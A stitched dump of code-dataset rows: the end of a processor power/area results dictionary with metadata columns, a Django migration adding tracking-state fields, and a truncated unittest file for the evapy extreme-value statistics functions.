'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0483626,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0483625,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.96037,
'Load Store Unit/Runtime Dynamic': 1.01815,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.119254,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.238507,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0423236,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0431333,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.228382,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0299921,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.457196,
'Memory Management Unit/Runtime Dynamic': 0.0731254,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 17.8464,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.153715,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0106073,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0952269,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.25955,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.62474,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0481763,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.240528,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.256632,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.183432,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.295868,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.149344,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.628644,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.170448,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.6106,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0484832,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00769394,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0738173,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0569014,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.1223,
'Execution Unit/Register Files/Runtime Dynamic': 0.0645954,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.167559,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.390344,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.72949,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00154481,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00154481,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00137578,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000549136,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000817394,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0052828,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0137305,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0547008,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.47944,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.171344,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.185789,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.86682,
'Instruction Fetch Unit/Runtime Dynamic': 0.430847,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0586491,
'L2/Runtime Dynamic': 0.0128165,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.82972,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.779612,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0515243,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0515243,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.07303,
'Load Store Unit/Runtime Dynamic': 1.08524,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.12705,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.2541,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0450905,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0458348,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.216339,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0284937,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.449905,
'Memory Management Unit/Runtime Dynamic': 0.0743286,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 17.6485,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.127537,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00982803,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0906633,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.228029,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.56075,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 1.954582126807236,
'Runtime Dynamic': 1.954582126807236,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.306278,
'Runtime Dynamic': 0.164718,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 80.318,
'Peak Power': 113.43,
'Runtime Dynamic': 18.9011,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 80.0117,
'Total Cores/Runtime Dynamic': 18.7364,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.306278,
'Total L3s/Runtime Dynamic': 0.164718,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}} | 75.047046 | 124 | 0.682008 | 8,082 | 68,593 | 5.782356 | 0.067558 | 0.123596 | 0.112982 | 0.093467 | 0.939593 | 0.932296 | 0.918302 | 0.886483 | 0.863244 | 0.842681 | 0 | 0.131687 | 0.224382 | 68,593 | 914 | 125 | 75.047046 | 0.74672 | 0 | 0 | 0.642232 | 0 | 0 | 0.657565 | 0.048109 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b07d7facc582e42ab2358891c868226d024b0ad1 | 3,815 | py | Python | isiscb/isisdata/migrations/0062_auto_20170426_1813.py | bgopalachary/IsisCB | c28e3f504eea60ebeff38318d8bb2071abb28ebb | [
"MIT"
] | 4 | 2016-01-25T20:35:33.000Z | 2020-04-07T15:39:52.000Z | isiscb/isisdata/migrations/0062_auto_20170426_1813.py | bgopalachary/IsisCB | c28e3f504eea60ebeff38318d8bb2071abb28ebb | [
"MIT"
] | 41 | 2015-08-19T17:34:41.000Z | 2022-03-11T23:19:01.000Z | isiscb/isisdata/migrations/0062_auto_20170426_1813.py | bgopalachary/IsisCB | c28e3f504eea60ebeff38318d8bb2071abb28ebb | [
"MIT"
] | 2 | 2020-11-25T20:18:18.000Z | 2021-06-24T15:15:41.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-04-26 18:13
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('isisdata', '0061_auto_20170324_1929'),
]
operations = [
migrations.AddField(
model_name='authority',
name='tracking_state',
field=models.CharField(blank=True, choices=[(b'HS', b'HSTM Upload'), (b'PT', b'Printed'), (b'AU', b'Authorized'), (b'PD', b'Proofed'), (b'FU', b'Fully Entered'), (b'BD', b'Bulk Data Update')], max_length=2, null=True),
),
migrations.AddField(
model_name='citation',
name='tracking_state',
field=models.CharField(blank=True, choices=[(b'HS', b'HSTM Upload'), (b'PT', b'Printed'), (b'AU', b'Authorized'), (b'PD', b'Proofed'), (b'FU', b'Fully Entered'), (b'BD', b'Bulk Data Update')], max_length=2, null=True),
),
migrations.AddField(
model_name='historicalauthority',
name='tracking_state',
field=models.CharField(blank=True, choices=[(b'HS', b'HSTM Upload'), (b'PT', b'Printed'), (b'AU', b'Authorized'), (b'PD', b'Proofed'), (b'FU', b'Fully Entered'), (b'BD', b'Bulk Data Update')], max_length=2, null=True),
),
migrations.AddField(
model_name='historicalcitation',
name='tracking_state',
field=models.CharField(blank=True, choices=[(b'HS', b'HSTM Upload'), (b'PT', b'Printed'), (b'AU', b'Authorized'), (b'PD', b'Proofed'), (b'FU', b'Fully Entered'), (b'BD', b'Bulk Data Update')], max_length=2, null=True),
),
migrations.AddField(
model_name='historicalperson',
name='tracking_state',
field=models.CharField(blank=True, choices=[(b'HS', b'HSTM Upload'), (b'PT', b'Printed'), (b'AU', b'Authorized'), (b'PD', b'Proofed'), (b'FU', b'Fully Entered'), (b'BD', b'Bulk Data Update')], max_length=2, null=True),
),
migrations.AlterField(
model_name='authority',
name='type_controlled',
field=models.CharField(blank=True, choices=[(b'PE', b'Person'), (b'IN', b'Institution'), (b'TI', b'Time Period'), (b'GE', b'Geographic Term'), (b'SE', b'Serial Publication'), (b'CT', b'Classification Term'), (b'CO', b'Concept'), (b'CW', b'Creative Work'), (b'EV', b'Event'), (b'CR', b'Cross-reference')], help_text=b'Specifies authority type. Each authority thema has its own list of controlled type vocabulary.', max_length=2, null=True, verbose_name=b'type'),
),
migrations.AlterField(
model_name='historicalauthority',
name='type_controlled',
field=models.CharField(blank=True, choices=[(b'PE', b'Person'), (b'IN', b'Institution'), (b'TI', b'Time Period'), (b'GE', b'Geographic Term'), (b'SE', b'Serial Publication'), (b'CT', b'Classification Term'), (b'CO', b'Concept'), (b'CW', b'Creative Work'), (b'EV', b'Event'), (b'CR', b'Cross-reference')], help_text=b'Specifies authority type. Each authority thema has its own list of controlled type vocabulary.', max_length=2, null=True, verbose_name=b'type'),
),
migrations.AlterField(
model_name='historicalperson',
name='type_controlled',
field=models.CharField(blank=True, choices=[(b'PE', b'Person'), (b'IN', b'Institution'), (b'TI', b'Time Period'), (b'GE', b'Geographic Term'), (b'SE', b'Serial Publication'), (b'CT', b'Classification Term'), (b'CO', b'Concept'), (b'CW', b'Creative Work'), (b'EV', b'Event'), (b'CR', b'Cross-reference')], help_text=b'Specifies authority type. Each authority thema has its own list of controlled type vocabulary.', max_length=2, null=True, verbose_name=b'type'),
),
]
| 68.125 | 473 | 0.611271 | 530 | 3,815 | 4.328302 | 0.203774 | 0.031386 | 0.069747 | 0.087184 | 0.84612 | 0.84612 | 0.84612 | 0.84612 | 0.84612 | 0.84612 | 0 | 0.013312 | 0.192661 | 3,815 | 55 | 474 | 69.363636 | 0.731494 | 0.017824 | 0 | 0.791667 | 1 | 0 | 0.361645 | 0.006143 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.041667 | 0 | 0.104167 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
b080217603fdc10fea41db1089886e7e327dfe35 | 5,606 | py | Python | tests/test_evstats.py | 4Subsea/evapy | be4f37b73bc22af700b75019dd23f73826e47f39 | [
"MIT"
] | 4 | 2016-06-07T11:06:43.000Z | 2020-04-23T18:42:25.000Z | tests/test_evstats.py | 4Subsea/evapy | be4f37b73bc22af700b75019dd23f73826e47f39 | [
"MIT"
] | 3 | 2016-06-07T11:06:05.000Z | 2016-12-13T19:40:19.000Z | tests/test_evstats.py | 4Subsea/evapy | be4f37b73bc22af700b75019dd23f73826e47f39 | [
"MIT"
] | 1 | 2019-10-05T14:45:54.000Z | 2019-10-05T14:45:54.000Z | import unittest
import numpy as np
from evapy import evstats
class Test__argrelmax(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_simple_find(self):
x = np.array([0., 1., 0., -1., 0., 2.])
calculated = evstats._argrelmax(x)
expected = np.array([False, True, False, False, False, False])
np.testing.assert_array_equal(calculated, expected)
def test_simple_find_none(self):
x = np.array([0., 1., 2., 3., 4., 5.])
calculated = evstats._argrelmax(x)
expected = np.array([False, False, False, False, False, False])
np.testing.assert_array_equal(calculated, expected)
class Test__argupcross(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_simple_find(self):
x = np.array([0., 1., -1., -2., -1., 1., 0.])
calculated = evstats._argupcross(x, x_up=0.)
expected = np.array([True, False, False, False, True, False, False])
np.testing.assert_array_equal(calculated, expected)
def test_simple_find_w_zero(self):
x = np.array([0., 1., 0., -1., -2., -1., 0., 1., 0.])
calculated = evstats._argupcross(x, x_up=0.)
expected = np.array([True, False, False, False, False, False, True,
False, False])
np.testing.assert_array_equal(calculated, expected)
def test_simple_find_w_other(self):
x = np.array([0., 1., 0., -1., -2., -1., 0., 1., 0.]) + 2.
calculated = evstats._argupcross(x, x_up=2.)
expected = np.array([True, False, False, False, False, False, True,
False, False])
np.testing.assert_array_equal(calculated, expected)
def test_simple_find_none(self):
x = np.array([0.1, 1., 2., 3., 4., 5.])
calculated = evstats._argupcross(x, x_up=0.)
expected = np.array([False, False, False, False, False, False])
np.testing.assert_array_equal(calculated, expected)
class Test_argrelmax(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_simple_find(self):
x = np.array([0., 1., 0., -1., 0., 2.])
calculated = evstats.argrelmax(x)
expected = np.array([1])
np.testing.assert_array_equal(calculated, expected)
def test_simple_find_repeat(self):
x = np.array([0., 1., 1., 0., -1., 0., 2.])
calculated = evstats.argrelmax(x)
expected = np.array([1])
np.testing.assert_array_equal(calculated, expected)
def test_simple_find_none(self):
x = np.array([0., 1., 2., 3., 4., 5.])
calculated = evstats.argrelmax(x)
expected = np.array([5])
np.testing.assert_array_equal(calculated, expected)
class Test_argupcross(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_simple_find(self):
x = np.array([-1., 1., -1., -2., -1., 1., 0.])
calculated = evstats.argupcross(x, x_up=0.)
expected = np.array([0., 4])
np.testing.assert_array_equal(calculated, expected)
def test_simple_find_w_zero(self):
x = np.array([0., 1., 0., -1., -2., -1., 0., 1., 0., 1.])
calculated = evstats.argupcross(x, x_up=0.)
expected = np.array([0, 6, 8])
np.testing.assert_array_equal(calculated, expected)
def test_simple_find_touch_below(self):
x = np.array([0., -1., 0., -1.])
calculated = evstats.argupcross(x, x_up=0.)
expected = np.array([0])
np.testing.assert_array_equal(calculated, expected)
def test_simple_find_w_other(self):
x = np.array([0., 1., 0., -1., -2., -1., 0., 1., 0.]) + 2.
calculated = evstats.argupcross(x, x_up=2.)
expected = np.array([0., 6.])
np.testing.assert_array_equal(calculated, expected)
def test_simple_find_none(self):
x = np.array([0.1, 1., 2., 3., 4., 5.])
calculated = evstats.argupcross(x, x_up=0.)
expected = np.array([0.])
np.testing.assert_array_equal(calculated, expected)
class Test_argrelmax_decluster(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_simple_find(self):
